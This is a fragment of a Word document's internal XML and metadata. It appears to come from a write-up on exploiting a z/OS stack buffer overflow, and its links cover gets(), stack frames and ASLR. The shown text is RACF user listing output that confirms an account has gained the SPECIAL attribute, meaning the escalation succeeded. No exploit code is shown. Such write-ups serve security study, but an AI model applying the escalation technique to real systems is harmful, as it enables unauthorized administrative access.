          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Listing the user details shows that we are now SPECIAL:</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USER=BASC8  NAME=USER BASC8  OWNER=PLAYBOX   CREATED=21.183</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DEFAULT-GROUP=BASCG    PASSDATE=21.183 PASS-INTERVAL=180   PHRASEDATE=N/A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ATTRIBUTES=SPECIAL</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REVOKE DATE=NONE   RESUME DATE=NONE</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LAST-ACCESS=21.230/10:19:20</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CLASS AUTHORIZATIONS=NONE</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NO-INSTALLATION-DATA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>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NO-MODEL-NAME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bm.com/docs/en/zos/2.3.0?topic=conventions-standard-save-area" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ibm.com/docs/en/zos/2.4.0?topic=dump-upward-growing-non-xplink-stack-frame-section" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.cppreference.com/w/c/io/gets" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ibm.com/docs/en/zos/2.4.0?topic=overview-address-space-layout-randomization" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.gi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LibreOffice/7.2.1.2$Linux_X86_64 LibreOffice_project/20$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>9</Pages>
  <Words>1810</Words>
  <Characters>9439</Characters>
  <CharactersWithSpaces>11947</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2021-09-03T08:34:04Z</dcterms:created>
  <dc:creator>Gassem, Zachary</dc:creator>
  <dc:description/>
  <dc:language>en-GB</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-20T10:12:59Z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